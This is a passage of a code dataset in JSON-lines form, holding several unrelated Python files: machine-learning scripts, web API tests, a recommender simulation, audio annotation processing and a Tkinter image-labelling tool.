= getLabels(train_d)\n Xte = getData(test_d)\n yte = getLabels(test_d)\n\n Xtr, Xte_ex, ytr, yte_ex = train_test_split(Xtr, ytr, 
test_size=0.5, random_state=42)\n\n\n # n_estimators is number of trees\n rand_forest = RandomForestClassifier(n_estimators=n_estimators)\n rand_forest.fit(Xtr, ytr)\n pred = rand_forest.predict(Xte_ex)\n print(f'split test set accuracy: {metrics.accuracy_score(yte_ex, pred)}')\n\n pred = rand_forest.predict(Xte)\n print(f'test set accuracy: {metrics.accuracy_score(yte, pred)}')\n\n return pred\n","sub_path":"random_forest.py","file_name":"random_forest.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"341420135","text":"import sys\nimport json\nimport matplotlib.pyplot as plt\n\ndef plot_hole(hole):\n xs, ys = zip(*hole)\n xs = list(xs)\n ys = list(ys)\n xs.append(xs[0])\n ys.append(ys[0])\n plt.plot(xs,ys,c='b')\n\ndef plot_figure(edges, vertices):\n for edge in edges:\n a = vertices[edge[0]]\n b = vertices[edge[1]]\n xs, ys = zip(a,b)\n plt.plot(xs, ys,c='r')\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n print(\"display_solution.py \")\n exit(1)\n\n problem = json.load(open(sys.argv[1]))\n solution = json.load(open(sys.argv[2]))\n plot_hole(problem[\"hole\"])\n plot_figure(problem[\"figure\"][\"edges\"], solution[\"vertices\"])\n plt.show()\n\n","sub_path":"display_solution.py","file_name":"display_solution.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"546164061","text":"def pal(num=3):\n result=[]\n largest=0\n for i in range(10**(num-1),10**num):\n for j in range(i,10**num):\n m=j*i\n if str(m)==str(m)[::-1] and m>largest:\n largest=i*j\n i_=i\n j_=j\n result.append(m)\n return largest,i_,j_\n\nprint(pal())\n","sub_path":"problems/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"396299612","text":"# -*- coding: utf-8 -*-\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n (\"wagtailsearch\", \"0002_add_verbose_names\"),\n ]\n\n operations = [\n # EditorsPicks have been moved to the \"wagtailsearchpromotions\" module.\n # Remove EditorsPick from wagtailsearch but don't drop the underlying table\n # so wagtailsearchpromotions can pick it up in its initial migration.\n # If wagtailsearchpromotions isn't installed, this table will remain\n # in the database unmanaged until it is. 
This could potentially happen\n # at any point in the future so it's important to keep this behaviour\n # even if we decide to squash these migrations.\n migrations.SeparateDatabaseAndState(\n state_operations=[\n migrations.RemoveField(\n model_name=\"editorspick\",\n name=\"page\",\n ),\n migrations.RemoveField(\n model_name=\"editorspick\",\n name=\"query\",\n ),\n migrations.DeleteModel(\n name=\"EditorsPick\",\n ),\n ],\n database_operations=[],\n )\n ]\n","sub_path":"wagtail/search/migrations/0003_remove_editors_pick.py","file_name":"0003_remove_editors_pick.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"297487632","text":"#\n# Length of Last Word\n# https://leetcode.com/problems/length-of-last-word/\n#\n# Return the length of the last word in a space separated string\n#\n\n\n# Finds first valid word from end, return 0 if word DNE\ndef length_last_word(s):\n words = reversed(s.split(\" \"))\n return next((len(w) for w in words if len(w) > 0), 0)\n\n\n# Better solution using two pointers\ndef length_last_word_ptrs(s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n l,r = len(s)-1,len(s)-1\n while r>=0 and s[r]==' ':\n r -= 1\n l = r\n while l>=0 and s[l]!=' ':\n l -= 1\n return r-l\n\n\n# Demonstration\ndef main():\n\n s = \"This is a sentence\"\n print(s, \"\\nLength of last word:\", length_last_word(s))\n\nmain()\n","sub_path":"length_last_word.py","file_name":"length_last_word.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"209261764","text":"import json\n\nfrom tests import client\nfrom tests.requests.payments_requests import get_all_payments, get_particular_payment, add_payment, change_payment, \\\n delete_payment\nfrom tests.requests.contracts_requests import get_all_contracts, delete_contract\n\n\ndef test_get_all_payments(client):\n rv = get_all_payments(client)\n assert bytes('15', encoding='utf-8') in rv.data\n\n\ndef test_get_particular_payment(client):\n rv = get_all_payments(client)\n rs = json.loads(rv.data, encoding='utf-8')\n\n cid = rs[0].get('id')\n rv = get_particular_payment(client, cid)\n\n assert bytes('15', encoding='utf-8') in rv.data\n\n\ndef test_nonexistent_id(client):\n cid = pow(2, 16)\n rv = get_particular_payment(client, cid)\n\n assert bytes('Such id does not exist', encoding='utf-8') in rv.data\n\n\ndef test_add_payment(client):\n rv = get_all_contracts(client)\n rs = json.loads(rv.data, encoding='utf-8')\n\n cid = rs[-1].get('id')\n rv = add_payment(client, cid, 10)\n assert bytes('Created successfully', encoding='utf-8') in rv.data\n\n\ndef test_change_payment(client):\n rv = get_all_contracts(client)\n rs = json.loads(rv.data, encoding='utf-8')\n\n cid = rs[-1].get('id')\n rv = change_payment(client, cid, 25)\n assert bytes('25', encoding='utf-8') in rv.data\n\n\ndef test_delete_payment(client):\n rv = get_all_contracts(client)\n rs = json.loads(rv.data, encoding='utf-8')\n\n cid = rs[-1].get('id')\n rv = delete_payment(client, cid)\n\n assert bytes(f'resource {cid} deleted successfully', encoding='utf-8') in rv.data\n\n\ndef test_delete_contract(client):\n rv = get_all_contracts(client)\n rs = json.loads(rv.data, encoding='utf-8')\n\n cid = rs[-1].get('id')\n rv = delete_contract(client, cid)\n\n assert bytes(f'resource {cid} deleted successfully', encoding='utf-8') in 
rv.data\n","sub_path":"tests/test_payments.py","file_name":"test_payments.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"360632559","text":"#!/usr/bin/python3\n#\n# Parsing a JSON file from python : A Basic Example\n#\nimport json\n\ndata = '''[\n {\n \"id\" : \"007\",\n \"x\" : \"2\",\n \"name\" : \"Chuck\"\n },\n {\n \"id\" : \"009\",\n \"x\" : \"7\",\n \"name\" : \"Chuck\"\n }\n]'''\n\ninfo = json.loads(data)\n\nprint(\"Type: %s, Count: %d\" % (type(info), len(info)))\n\nfor item in info:\n print('Name:', item[\"name\"])\n print('Id:', item[\"id\"])\n","sub_path":"python/random/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"194771061","text":"import pandas as pd\nimport numpy as np\nimport pickle\nimport cProfile\nfrom copy import copy\n\nfrom joblib import Parallel, delayed\n\nimport itertools\nfrom scipy import stats\nfrom scipy.stats import beta\n\n\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport cProfile\nimport numba\n\nfrom joblib import Parallel, delayed\n\nimport itertools\nfrom scipy import stats\nfrom scipy.stats import beta\n\nWRITE_FILE = 'sim_results_t_25.p'\nOMNI = 'rec'\nPARTIAL = 'partial'\nNO_REC = 'no_rec'\n\n\n###SETUP FUNCTIONS\ndef d(i,j, N):\n return min(abs(i-j), abs(j-i), abs(j-i-N), abs(i-j-N))\n\ndef cov_mat_fun(sigm, rh, N):\n cov_mat = np.ones((N,N))\n for i in range(0,N):\n for j in range(0,N):\n cov_mat[i,j] = rh**d(i,j, N)\n cov_mat = sigm * cov_mat\n return cov_mat\n\n\n\n### Welfare Functions - Statistic Calculation Functions\n\n\ndef w_fun(CiT,Ui):\n w_score = 0.0\n for i in range(len(CiT)):\n w_score = w_score + Ui[CiT[i]]\n return w_score*(T**(-1))\n\n\n## Bayesian updating\n@numba.jit\ndef inv_nla_jit(A):\n return np.linalg.inv(A)\n\ndef update_Ui(Cit,Ui,mu_Ui, Sigma_Ui, Nset):\n x1 = Cit\n x2 = [n for n in Nset if n not in Cit]\n Nit = [n for n in Nset if n not in Cit]\n mu1 = np.array([mu_Ui[n] for n in x1]).reshape((1,len(x1)))\n mu2 = np.array([mu_Ui[n] for n in x2]).reshape((1,len(x2)))\n Sigma11 = np.ones((len(x1),len(x1)))\n Sigma21 = np.ones((len(x2),len(x1)))\n for i in range(len(Cit)):\n for j in range(len(Cit)):\n Sigma11[i,j] = Sigma_Ui[Cit[i],Cit[j]]\n for i in range(len(Cit)):\n for j in range(len(Nit)):\n Sigma21[j,i] = Sigma_Ui[Cit[i], Nit[j]]\n a = np.array([Ui[n] for n in x1]).reshape((1,len(x1)))\n inv_mat = inv_nla_jit(Sigma11)\n inner = np.matmul(Sigma21, inv_mat)\n mubar = mu2 + (np.matmul(inner,(a-mu1).T)).T\n mu_new = mu_Ui\n for i in range(len(x1)):\n mu_new[x1[i]] = Ui[i]\n for i in range(len(x2)):\n mu_new[x2[i]] = mubar[0,i]\n return mu_new\n\n## CHOICE FUNCTIONS\ndef choice_helper(Cit,mu, Nset):\n x2 = [n for n in Nset if n not in Cit]\n cit = x2[np.argmax([mu[i] for i in x2])]\n return cit\n\ndef choice_ind(U_i,mu_U_i, Sigma_U_i,T,N, Nset):\n C_iT = []\n for t in range(T):\n mu_Uit = copy(mu_U_i)\n if len(C_iT) > 0:\n mu_Uit = update_Ui(C_iT,U_i,mu_U_i, Sigma_U_i, Nset)\n c_it = choice_helper(C_iT,mu_Uit, Nset)\n C_iT = C_iT + [c_it]\n return C_iT\n\n\ndef choice_omni(U_i,T,N, Nset):\n C_iT = []\n for t in range(T):\n c_it = choice_helper(C_iT,U_i, Nset)\n C_iT = C_iT + [c_it]\n return C_iT\n\n\ndef choice_part(V_i, mu_V_i,Sigma_V_i,V,T,N, Nset):\n C_iT = []\n R_iT = []\n for t in range(T):\n mu_Vit = mu_V_i\n if len(C_iT) > 0:\n mu_Vit = update_Ui(C_iT,V_i,mu_V_i, Sigma_V_i, 
Nset)\n mu_Uit = beta*mu_Vit+(1-beta)*V\n c_it = choice_helper(C_iT,mu_Uit, Nset)\n Nit = [n for n in Nset if n not in C_iT]\n r_it = Nit[np.argmax([V[i] for i in Nit])]\n R_iT = R_iT + [r_it]\n C_iT = C_iT + [c_it]\n\n return C_iT, R_iT\n\ndef simulate(\n N,\n T,\n sigma,\n sigma_i,\n sigma_ibar,\n beta,\n nr_ind,\n Sigma_V_i,\n Sigma_V,\n Sigma_V_ibar,\n seed=1.0\n):\n print(\"iteration\")\n print(seed)\n np.random.seed(int(seed))\n Nset = range(0,N)\n mu_V = np.zeros(N)\n V = np.random.multivariate_normal(mu_V, Sigma_V)\n mu_V.reshape((1,N))\n C_pop = { NO_REC: [], OMNI: [], PARTIAL: []}\n W_pop = { NO_REC: [], OMNI: [], PARTIAL: []}\n R_pop = { NO_REC: [], OMNI: [], PARTIAL: []}\n for it_ind in range(nr_ind):\n mu_V_ibar = np.random.multivariate_normal(np.zeros(N), Sigma_V_ibar)\n mu_V_i = copy(mu_V_ibar)\n V_i = np.random.multivariate_normal(mu_V_i, Sigma_V_i)\n mu_V_i.reshape((1,N))\n U_i = beta * V_i + (1-beta) * V\n mu_U_i = beta * mu_V_i + (1-beta) * mu_V\n #print(mu_U_i)\n #print(U_i)\n\n ##No Rec Case\n Sigma_U_i = beta**2 * Sigma_V_i + (1-beta)**2 * Sigma_V\n C_iT = choice_ind(U_i,copy(mu_U_i), Sigma_U_i,T,N, Nset)\n C_pop[NO_REC] += [C_iT]\n w_val = w_fun(C_iT,U_i)\n W_pop[NO_REC] += [w_val]\n #print(C_iT)\n ## OMNI CASE\n C_iT = choice_omni(U_i,T,N, Nset)\n C_pop[OMNI] += [C_iT]\n w_val = w_fun(C_iT,U_i)\n W_pop[OMNI] += [w_val]\n #print(C_iT)\n ## PARTIAL REC Case\n\n mu_V_i = copy(mu_V_ibar)\n mu_V_i.reshape((1,N))\n C_iT, R_iT = choice_part(V_i,mu_V_i, Sigma_V_i,V,T,N, Nset)\n C_pop[PARTIAL] += [C_iT]\n w_val = w_fun(C_iT,U_i)\n W_pop[PARTIAL] += [w_val]\n R_pop[PARTIAL] += [R_iT]\n return { 'Consumption': C_pop, 'Welfare': W_pop, 'Rec': R_pop }\n\n\n\nN = 1000\nT = 50\nnr_pop = 25\nnr_ind = 25\nsigma_ibar = 0.1\nrho_ibar = 0\n\nnum_cores = 8\nsim_results ={}\nrho_vals = [0.1, 0.5, 0.9]\nbeta_vals = [0.1, 0.5, 0.9]\nsigma_vals = [0.25, 1.0, 4.0]\nfor rho in rho_vals:\n for beta in beta_vals:\n for sigma in sigma_vals:\n print(rho, beta, sigma)\n sigma_i = sigma\n Sigma_V_i = cov_mat_fun(sigma_i,rho,N)\n Sigma_V = cov_mat_fun(sigma,rho,N)\n Sigma_V_ibar = cov_mat_fun(sigma_ibar,rho_ibar,N)\n sim_results[(N, T, rho, beta, sigma)] = Parallel(n_jobs=num_cores)(delayed(simulate)(N,T,sigma,sigma_i,sigma_ibar,beta,nr_ind,Sigma_V_i, Sigma_V, Sigma_V_ibar, seed=i+1) for i in range(nr_pop))\n print(\"finished a population run\")\n with open(WRITE_FILE, 'wb') as fp:\n pickle.dump(sim_results, fp)\n\nwith open(WRITE_FILE, 'wb') as fp:\n pickle.dump(sim_results, fp)\n","sub_path":"paper/simulations.py","file_name":"simulations.py","file_ext":"py","file_size_in_byte":5665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"439030495","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass ReceiverInfoVO(object):\n\n def __init__(self):\n self._area = None\n self._city = None\n self._detail_address = None\n self._mobile = None\n self._name = None\n self._province = None\n\n @property\n def area(self):\n return self._area\n\n @area.setter\n def area(self, value):\n self._area = value\n @property\n def city(self):\n return self._city\n\n @city.setter\n def city(self, value):\n self._city = value\n @property\n def detail_address(self):\n return self._detail_address\n\n @detail_address.setter\n def detail_address(self, value):\n self._detail_address = value\n @property\n def mobile(self):\n return self._mobile\n\n @mobile.setter\n def mobile(self, value):\n 
self._mobile = value\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, value):\n self._name = value\n @property\n def province(self):\n return self._province\n\n @province.setter\n def province(self, value):\n self._province = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.area:\n if hasattr(self.area, 'to_alipay_dict'):\n params['area'] = self.area.to_alipay_dict()\n else:\n params['area'] = self.area\n if self.city:\n if hasattr(self.city, 'to_alipay_dict'):\n params['city'] = self.city.to_alipay_dict()\n else:\n params['city'] = self.city\n if self.detail_address:\n if hasattr(self.detail_address, 'to_alipay_dict'):\n params['detail_address'] = self.detail_address.to_alipay_dict()\n else:\n params['detail_address'] = self.detail_address\n if self.mobile:\n if hasattr(self.mobile, 'to_alipay_dict'):\n params['mobile'] = self.mobile.to_alipay_dict()\n else:\n params['mobile'] = self.mobile\n if self.name:\n if hasattr(self.name, 'to_alipay_dict'):\n params['name'] = self.name.to_alipay_dict()\n else:\n params['name'] = self.name\n if self.province:\n if hasattr(self.province, 'to_alipay_dict'):\n params['province'] = self.province.to_alipay_dict()\n else:\n params['province'] = self.province\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = ReceiverInfoVO()\n if 'area' in d:\n o.area = d['area']\n if 'city' in d:\n o.city = d['city']\n if 'detail_address' in d:\n o.detail_address = d['detail_address']\n if 'mobile' in d:\n o.mobile = d['mobile']\n if 'name' in d:\n o.name = d['name']\n if 'province' in d:\n o.province = d['province']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/ReceiverInfoVO.py","file_name":"ReceiverInfoVO.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"18407645","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 27 16:13:30 2020\n\n@author: pcancela\n\"\"\"\n\n# Now go through each of the jsons and crop each audio segment\nimport sox\nimport ntpath\nimport os\nimport json\nimport zipfile\nimport wget\nimport numpy\nimport os\nimport pathlib\n\nimport csv\n\n \n\ndef create_json(file_path, name , main_sound_type, time_start, time_end,min_label):\n json_segment = { \"name\": name,\"file_path\": file_path, \"main_label\": main_sound_type, \"time_start\":time_start, \"time_end\":time_end}\n labels = [];\n verbose = True\n with open(file_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n line_count = 0\n for row in csv_reader:\n if verbose:\n print(f'\\t{row[0]} {row[1]} {row[2]}')\n line_count += 1\n time_s = float(row[0])\n time_e = float(row[1])\n label = row[2]\n # if (time_s <= time_start) and (time_end <= time_e): # REVISAR CRITERIO\n if((min(time_e,time_end)-max(time_s,time_start)) > min_label):\n labels.append(label)\n if verbose: \n print(f'Processed {line_count} lines.')\n json_segment[\"labels\"] = labels\n print(json_segment)\n return json_segment\n\ndef create_json_gap(file_path, name , time_start, time_end):\n json_segment = { \"name\": name,\"file_path\": file_path, \"main_label\": \"music\", \"time_start\":time_start, \"time_end\":time_end}\n labels = [];\n verbose = True\n with open(file_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n line_count = 0\n for row in csv_reader:\n if verbose:\n print(f'\\t{row[0]} {row[1]} {row[2]}')\n line_count += 1\n time_s = float(row[0])\n time_e = float(row[1])\n 
label = row[2]\n # if (time_s <= time_start) and (time_end <= time_e): # REVISAR CRITERIO\n if((min(time_e,time_end)-max(time_s,time_start)) > min_label):\n labels.append(label)\n if verbose: \n print(f'Processed {line_count} lines.')\n json_segment[\"labels\"] = labels\n print(json_segment)\n return json_segment\n\n\ndef procesar_anotaciones(file_path, name_base, sound_type, clip_length,min_label,overlap,mavd_path, split):\n \"\"\"\" Reads the annotations from MAVD on file_path, and writes jsons with a filename with prefix name_base.\n The\n clip_length (secs) - total length of the audio\n min_label (secs) - minimum length of the label\n overlap (secs) - maximum time overlap between clips generated from the same label.\n \"\"\"\n\n verbose = 0\n segments = [];\n counter = 0\n annot_json_dir = os.path.join(mavd_path, split,\"jsons\")\n if not os.path.exists(annot_json_dir):\n pathlib.Path(annot_json_dir).mkdir(parents=True, exist_ok=True)\n #os.mkdir(annot_json_dir, exist_ok=True)\n with open(file_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n line_count = 0\n for row in csv_reader:\n if verbose:\n print(f'\\t{row[0]} {row[1]} {row[2]}')\n line_count += 1\n time_start = float(row[0])\n time_end = float(row[1])\n if (time_end-time_start > min_label) and (row[2] == sound_type):\n print(f'\\t{row[0]} {row[1]} {row[2]}')\n for sg_start_time in numpy.arange(max(time_start-(clip_length-min_label),0),time_end-min_label,overlap):\n segments.append((sg_start_time,sg_start_time+clip_length))\n segment_name = name_base+\"_\"+str(counter); # DECIDIR/MEJORAR\n start = sg_start_time\n end = numpy.around(sg_start_time+clip_length, decimals=3)\n assert(numpy.around(end-start, decimals=6)==clip_length)\n json_segment = create_json(file_path, segment_name , row[2] , sg_start_time, sg_start_time+clip_length,min_label)\n with open(os.path.join(mavd_path, split,\"jsons\", segment_name+\".json\"), 'w') as outfile:\n json.dump(json_segment, outfile)\n counter += 1\n if verbose: \n print(segments)\n if verbose: \n print(f'Processed {line_count} lines.')\n return segments, counter\n\n\n\n\n# This is the main script that goes over all desired tags for a duration \n# looking for segments in all the annotation MAVD files in the given path\n\nd = 10\ndef process_mavd(duration = 10, #seconds,\n clip_length = 10,\n min_label = 1,\n overlap = 1,\n mavd_path = \"MAVD/\", split=\"train\", train_frac = 0.8, tagless_frac = 0.3):\n\n tags = [\"motorcycle/engine_idling\",\"motorcycle/engine_accelerating\",\"car/engine_accelerating\",\"car/engine_idling\",\"1-2_medium-sounding-engine_presence\",\"bus/engine_accelerating\",\"bus/engine_idling\",\"truck/engine_accelerating\",\"truck/engine_idling\",\"chatter\",\"music\"]\n \n #[\"bus/engine_accelerating\"]\n '''\n \n # Download MAVD if it isn't found on ../\n MAVD_files = []\n if not os.path.exists(\"MAVD/annotations_train/\"):\n # name of the audio files in the dataset\n MAVD_files.append(\"annotations_train.zip\")\n \n # url of the MAVD dataset in zenodo\n MAVD_url = 'https://zenodo.org/record/3338727/files/'\n \n # output directory to save downloaded files\n MAVD_dir = \"MAVD/\"\n \n for zip_file in MAVD_files:\n print('Downloading file: ', zip_file)\n wget.download(MAVD_url + zip_file, MAVD_dir)\n print()\n print('Done!')\n \n for zip_file in MAVD_files:\n print('Extracting file: ', zip_file)\n zip_ref = zipfile.ZipFile(MAVD_dir + zip_file) # create zipfile object\n zip_ref.extractall(MAVD_dir) # extract file to dir\n zip_ref.close() # close file\n 
os.remove(MAVD_dir + zip_file) # delete zipped file\n print('Done!')\n \n '''\n \n main_counter=1\n for dirpath, dnames, fnames in os.walk(os.path.join(mavd_path, \"annotations\", split)):\n for f in fnames:\n if f.endswith(\".txt\") and not f.startswith('._'):\n train = numpy.random.binomial(1, train_frac, size=1)\n if train:\n split_out = \"train\"\n overlap_out = overlap\n else:\n split_out = \"validate\"\n overlap_out = clip_length\n print(split_out) \n for tag in tags:\n main_counter += 1\n print(os.path.join(dirpath, f))\n name_base = \"audio_\"+str(main_counter)\n segments, counter = procesar_anotaciones(os.path.join(dirpath, f),name_base,tag,duration,min_label,overlap_out, mavd_path, split_out)\n print(segments)\n # Adjust number of tagless segments\n if train:\n n_gaps = tagless_frac*counter\n gaps = find_gaps(os.path.join(dirpath, f), name_base,clip_length, n=n_gaps, mavd_path = mavd_path, split = split_out)\n else:\n n_gaps = max(0,(tagless_frac-0.1)*counter)\n \n \ndef find_gaps(file_path, name_base,clip_length, n=10, mavd_path = \"MAVD\", split = \"train\"):\n tags = [\"motorcycle/engine_idling\",\n \"motorcycle/engine_accelerating\",\n \"car/engine_accelerating\",\n \"car/engine_idling\",\n \"bus/engine_accelerating\",\n \"bus/engine_idling\",\n \"truck/engine_accelerating\",\n \"truck/engine_idling\"] \n verbose = 0\n segments = [];\n counter = 0\n annot_json_dir = os.path.join(mavd_path, split,\"jsons\")\n if not os.path.exists(annot_json_dir):\n os.pathlib.Path(annot_json_dir).mkdir(parents=True, exist_ok=True)\n \n with open(file_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n line_count = 0\n data = []\n for row in csv_reader:\n data.append([float(row[0]),float(row[1]),row[2]]) \n data.sort()\n gap_start = 0;\n for row in data:\n if verbose:\n print(f'\\t{row[0]} {row[1]} {row[2]}')\n line_count += 1\n time_start = float(row[0])\n time_end = float(row[1])\n if((row[2] in tags) and time_start > gap_start):\n gap_end = time_start;\n if gap_end-gap_start>clip_length:\n segments.append((gap_start,gap_start+clip_length))\n gap_start = time_end;\n segment_name = name_base+\"_gap_\"+str(counter);\n json_segment = { \"name\": segment_name,\"file_path\": file_path, \"main_label\": [], \"time_start\": gap_start, \"time_end\":gap_start+clip_length}\n json_segment[\"labels\"] = []\n if counter\", self.clicked)\n self.bind(\"\", self.click_release)\n self.bind(\"\", self.move_mouse)\n self.bind(\"\", self.on_enter)\n self.bind(\"\", self.on_leave)\n self.bind(\"\", self.on_resize)\n self.new_label_clicked_xy = None\n self.new_label_released_xy = None\n self.new_label_temporary_box = None\n self.new_label_temporary_text = None\n self.editing = False\n\n self.image_filename = DEFAULT_IMAGE_FILENAME\n self.resizeable_image = Image.open(self.image_filename)\n self.resizeable_image = self.resizeable_image.resize((1200, 800), Image.ANTIALIAS)\n self.resized_photoimage = ImageTk.PhotoImage(self.resizeable_image)\n self.image_on_canvas = self.create_image(0,0, anchor=tk.NW, image=self.resized_photoimage, tag=\"all\")\n self.config(cursor = 'none')\n self.rollingover_label = False\n\n self.addtag_all(\"all\")\n self.update()\n print(self.image_on_canvas)\n\n self.labels = [] #[(bb, class, bb_id, text_id)]\n\n def on_resize(self, event):\n print(\"on_resize\", event.width, event.height)\n self.width = event.width\n self.height = event.height\n self.load_image(self.image_filename)\n\n def save_labels(self, image_filename, labels):\n\n label_filename = 
os.path.splitext(image_filename)[0] + \".txt\"\n print(\"saved labels\", image_filename, label_filename, labels)\n with open(label_filename, \"w\") as f:\n yolo_formatted_labels = [[str(CLASSES.index(class_name)), #Class Name\n str(bb[0]), #x\n str(bb[1]), #y\n str(bb[2] - bb[0]), #width\n str(bb[3] - bb[1])] #height\n for bb, class_name, bb_id, text_id in labels ]\n f.write(\"\\n\".join([\" \".join(yolo_label) for yolo_label in yolo_formatted_labels]))\n def clear_labels(self):\n for label in self.labels:\n bb, class_name, bb_id, text_id = label\n self.delete(bb_id)\n self.delete(text_id)\n self.labels = []\n\n def clear_last_label(self):\n if self.labels:\n bb, class_name, bb_id, text_id = self.labels[-1]\n self.delete(bb_id)\n self.delete(text_id)\n self.labels.pop(-1)\n print(\"New labels list:\")\n print(self.labels)\n else:\n print(\"No boxes left to delete\")\n\n def delete_label_file(self):\n self.clear_labels()\n label_filename = os.path.splitext(self.image_filename)[0] + \".txt\"\n if os.path.exists(label_filename):\n os.remove(label_filename)\n\n\n def load_labels(self, image_filename):\n #check if label file exists\n label_filename = os.path.splitext(image_filename)[0] + \".txt\"\n #self.clear_labels() #delete this line if you want to have labels roll over from previous frame\n print(\"Rollingover label:\", self.rollingover_label) \n \n if self.rollingover_label == False:\n self.clear_labels()\n\n if os.path.exists(label_filename) and self.rollingover_label == True:\n print(\"labels exist, don't overwrite\")\n self.clear_labels()\n\n if len(self.labels) > 0:\n print (\"labels exist, no need to overwrite\")\n else:\n if os.path.exists(label_filename):\n print(\"Loading existing labels for\", image_filename)\n with open(label_filename, \"r\") as yolo_label_file:\n yolo_labels = yolo_label_file.read().splitlines()\n for yolo_label in yolo_labels:\n class_index, x, y, width, height = yolo_label.split(\" \")\n class_index = int(class_index)\n x, y, width, height = float(x), float(y), float(width), float(height)\n class_name = CLASSES[class_index]\n bb = [x,y, x+width, y+height]\n bb_id = self.create_rectangle(bb[0] * self.winfo_width(),bb[1] * self.winfo_height() ,bb[2] * self.winfo_width(),bb[3] * self.winfo_height(), fill=\"\", outline=COLORS[class_index])\n new_label_text_id = self.create_text(x * self.winfo_width(), (y * self.winfo_height()) - 5, fill=COLORS[class_index], text=class_name)\n self.labels.append([bb,class_name,bb_id, new_label_text_id])\n print(\"labels:\")\n for label in self.labels:\n print(label)\n\n def load_image(self,filename):\n print(filename)\n if self.image_filename != DEFAULT_IMAGE_FILENAME:\n if len(self.labels) > 0:\n print(\"Saving Labels\", self.image_filename)\n self.save_labels(self.image_filename, self.labels)\n else:\n print(\"removing labels\", self.image_filename)\n self.delete_label_file()\n self.load_labels(filename)\n self.image_filename = filename\n self.resizeable_image = Image.open(self.image_filename).resize((self.width, self.height), Image.ANTIALIAS)\n self.resized_photoimage = ImageTk.PhotoImage(self.resizeable_image)\n self.itemconfig(self.image_on_canvas, image=self.resized_photoimage)\n\n def cancel(self): #Captured by Root bind_all method\n print(\"Cancelled Executed...\")\n self.new_label_clicked_xy = None\n if self.new_label_temporary_box:\n self.delete(self.new_label_temporary_box)\n self.delete(self.new_label_temporary_text)\n def update_crosshair(self,event):\n global SELECTED_CROSS_HAIR_COLOR_INDEX\n if 
self.horizontal_dash_line:\n self.delete(self.horizontal_dash_line)\n if self.vertical_dash_line:\n self.delete(self.vertical_dash_line)\n cross_hair_color = \"red\" if self.editing else CROSS_HAIR_COLORS[SELECTED_CROSS_HAIR_COLOR_INDEX]\n\n self.horizontal_dash_line = self.create_line(0, event.y, self.winfo_width(), event.y, fill=cross_hair_color, dash=(5, 2))\n self.vertical_dash_line = self.create_line(event.x, 0, event.x, self.winfo_height(), fill=cross_hair_color, dash=(5, 2))\n def move_mouse(self, event):\n self.update_crosshair(event)\n if self.image_filename == DEFAULT_IMAGE_FILENAME:\n return\n if self.new_label_clicked_xy != None:\n if self.new_label_temporary_box != None:\n self.delete(self.new_label_temporary_box)\n self.delete(self.new_label_temporary_text)\n x1, y1 = self.new_label_clicked_xy\n x2 = min(max(event.x, 0), self.winfo_width()) # Don't go out of bounds\n y2 = min(max(event.y, 0), self.winfo_width())\n self.new_label_temporary_box = self.create_rectangle(x1,y1, x2,y2, fill=\"\", outline=COLORS[SELECTED_CLASS], dash=(5, 2))\n self.new_label_temporary_text = self.create_text(x1, y1 - 5, fill=COLORS[SELECTED_CLASS], text=CLASSES[SELECTED_CLASS])\n def clicked(self, event):\n if self.editing:\n x,y = (event.x/self.winfo_width(), event.y/self.winfo_height())\n candidate_click = None\n min_candidate_click_distance = 9999999999\n\n for i in range(len(self.labels)):\n label = self.labels[i]\n bb, class_name, bb_id, new_label_text_id = label\n if x >= bb[0] and x <= bb[2] and y >= bb[1] and y <= bb[3]:\n print(\"found match\", x,y, bb)\n current_distance = (bb[0] - x) **2 + (bb[1] - y) ** 2\n if current_distance ', lambda event: self.open_frames())\n self.bind_all('', self.quit_app)\n self.bind_all('', lambda event: self.frame_canvas.cancel())\n self.bind_all(\"\", self.hotkey)\n\n #figure out how to\n def hotkey(self, event):\n if event.char in selected_class_indexes_as_strs:\n selected_class = int(event.char) - 1\n print(\"Updating class label to \", selected_class, CLASSES[selected_class])\n self.selected_optionmenu.set(CLASSES[selected_class])\n elif event.char == \"d\":\n if len(self.frames) > 0:\n self.current_frame_index = (self.current_frame_index + 1) % len(self.frames)\n self.frame_canvas.load_image(self.frames[self.current_frame_index])\n self.filename_label.config(text= \"Current File: \" + self.frames[self.current_frame_index])\n elif event.char == \"a\":\n if len(self.frames) > 0:\n self.current_frame_index = (self.current_frame_index - 1) % len(self.frames)\n 